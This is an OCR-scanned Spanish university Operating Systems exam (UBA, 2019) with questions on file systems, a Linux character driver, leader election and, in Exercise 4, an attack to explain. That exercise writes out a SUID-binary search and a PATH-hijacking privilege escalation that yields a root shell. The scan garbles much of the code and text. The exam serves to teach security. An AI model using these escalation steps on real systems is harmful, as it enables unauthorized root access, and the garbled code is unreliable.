Sistemas Operativos Nombre y apellido:
Depar to de C ién — FCEyN — UBA N2 orden: M L.U.
Segundo cuatrimestre de 2019

t—_ Cant. hojas: _5___
- 1 2 3 4 | Nota
Segundo recuperatorio — 26/11 - Segundo recuperatorio de 2019 25 |25 |25 (25 [Hco

Numere las hojas entregadas. Complete en la primera hoja la cantidad total de hojas entregadas.
Entregue esta hoja junto al examen, la misma no se incluye en la cantidad total de hojas entregadas.

= Cada ejercicio debe realizarse en hojas separadas y numeradas. Debe identificarse cada hoja con nombre, apellido ¥y LU.

= La devolucién de los exd corregidos es personal. Los pedidos de revisidn se realizardn por escrito, antes de retirar el examen
corregido del aula,

= Los parciales tienen tres notas: [ (Insuficiente): 0 a 59 pts, A- (Aprobado condicional): 60 a 64 pts y A (Aprobado): 65 a 100 pts.
No se puede aprobar con A- ambos parciales. Los recuperatorios tienen dos notas: I: 0 a 64 pts ¥ A: 65 a 100 pts,

Ejercicio 1.(25 puntos)

Se tiene un file system hibrido Inodo + Lista enlazada. Los inodos son tipo F'S Ext2, a excepcitén que solo tiene una
indireccion que apunta a una lista enlazada, la cual es una lista de los bloques restantes del archivo. Los primeros 12
bloques del archivo son apuntados de forma directa desde los apuntadores directos del inodo, el resto se registran en la
lista enlazada. Cada nodo de la lista tiene dos apuntadores: uno apunta a un bloque del archivo, y el otro apunta al
siguiente nodo. El iiltimo nodo de la lista apunta al 1iltimo bloque del archivo, y a NULO. El FS tiene blogues de tamafio
8 KB. Se usan 32 bits para direccionar bloques. La memoria usa palabras de 32 bits. El filesystem contiene un archivo
recu2.txt de 450 MB, en la ruta /tmp/parciales. Si se requieren leer los primeros 35000000 bytes del archivo, a partir del
byte 40[."3[)0, del mismo archivo:

a) jQué estructuras de datos del file system se deben usar para hacer la lectura? jEn qué orden?

b) jAproximadamente cudntos accesos de escritura y de lectura a disco se deben hacer? Justifique su respuesta, y
mencione qué consideraciones tomé en cuenta.

¢) jAproximadamente cudntos accesos de escritura y de lectura a memoria se deben hacer? Justifique su respuesta y
mencione qué consideraciones tomé en cuenta.

Considere que el FS ya estd montado, pero no se han cargado ninguna de sus estructuras a la memoria.
Ejercicio 2.(25 puntos)
Expligue qué funcién hace un driver que usa el codigo que se muestra a continuacién. Justifique su respuesta explicando
el funcionamiento de las partes principales del codigo.

#define MODULE
#define __KERNEL__
struct file_operations memoria fops = {
read: memoria_read,
write: memoria_write,
open: memoria_open,
release: memoria_release };
int memoria_major = 60;
char *memoria_buffer;
int init_module(void) {
int result;
result = register_chrdev(memoria_major, "memoria",kmemoria_fops);
if (result < 0) {
printk("<i>memoria: no puedo obtener numerc mayor %d\n",memoria_major);
return result; }
memoria_buffer = kmalloc(1, GFP_KERNEL);
if (!memoria buffer) { 4 I rrin I
result = -ENOMEM; .

goto fallo; } B 5
memset(memoria_buffer, 0, 1); f{ fee. © 2 2] IGJ‘[{ e
printk("<i>Insertando module\n");
return 0;

fallo:
cleanup_module() ;
return result; }
void cleanup_module(void) {
unregister_chrdev(memoria major, "memoria");
if (memoria_buffer) { kfree(memoria_buffer); }
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printk("<i>Quitando modulohn"); }
int memoria open(struct ipode *inode, struct file #filp) {
MOD_INC_USE_COUNT;
return 0; }
int memoria release{struct inode *inode, struct file =filp) {
MOD_DEC_USE_COUNT;
return 0; }
ssize_t memoria_read(struct file #filp, char *buf,size_t count, loff_ t loffset) 1

copy_to_user (buf ,memoria_buffer,1); |-€> L@?}‘&n ol L-"Sud\. @ Lo que hoj B t_J E‘-"Ff{\

if (woffset == 0) { i g o S Ll d
woffaat+el; & Pt -
return 1; }

else { return 0; } }
ssize_t memoria_write{ struct file »filp, char ebuf,size t count, loff t woffset) {

0-\ !

char *tmp; £08
tmp=buf+count-1; 5 ] | Rl B ON)
copy_from_user (memoria_buffer,tsp,1); "."E'|I YO D BT = e < 4
return 1; } j / el
. ey
Ayudas:
= La funcién tde C % (void *sir, int e, size_t n) copia el caracter ¢ (un char sin signo} a los primeros

n caracteres de sir.
= MOD_INC_USE_COUNT / MOD_DEC_USE_COUNT: Macros ugadas para incrementar o decrementar el niimero
de usnarips que estdn usando el driver en un determinado momento. El SO se encarga de gestionarlas.
Ejercicio 3.(25 puntos)
En gran variedad de sistemas distribuidos es importante seleccionar un lider entre los nodos participantes para que
coordine las acciones de todo el grupo. Proponga v eseriba un algoritmo para seleccionar un lider entre N nodos que
participan en un sistema distribuido, e incluya la posibilidad de seleccionar un nuevo lider si el actual falla.
Ejercicio 4.(25 puntos)
Cada uno de los siguientes pasos s¢ realiza para ejecutar un ataque. Explique el ataque gque se realiza. Justifique su
respuesta explicando para qué se realiza cada paso.
ﬂ. § find / -user root —perm -4000 -exec 1s -1d {F %; muicow dfTlyveL © Po% g i £
-Twer-xr-% 1 root Toot 8640 nov 20 11:20 /home/rbaader/Escritorio/scp
Z § cd /home/rbaader/Eacritorio
3 g Invace .fecp  COUS TN <md gy oo vt L g
aystem("ssh milagro@dc.uba.ar”"C <po return ...>
--~ SIGINT (Interrupt) ——
=== SIGCHLD (Child exited) -—
<... system resumed> ) =4
+++ exited (status 0) +++
4§ cat <<EOT >> ssh.c
int main(int arge, char *=argv) {
setuid(0);
system("id &% whoami');
return 0; } 5

EOT
G & gee ssh.c —o ssh
¢ § chmod +x ssh
38 1s -1 ssh ol gl
~ruxrwxr-x 1 rbaader rbaader 8571 Jan 18 09:03 ash | F5 W
§$ PATH=. :${PATH}
4§ export PATH |
498 echo $PATH M DA A AJ! |
. :/usr/local/sbin: /usr/local/bin: /usr/sbin: /fusr/bin: /sbin: /bin: fnsrfgamas Jusr/local/games
acp
wid=0(root) gid=1000(rbaader) groups=0(root),1000(rbaader)
Toot

Ayuda:

= ltrace es un rastreador de [l {as a librerias dindmicas del si v se utiliza principalmente para rastroar
llamadas a funciones de librerias realizadas por programas.
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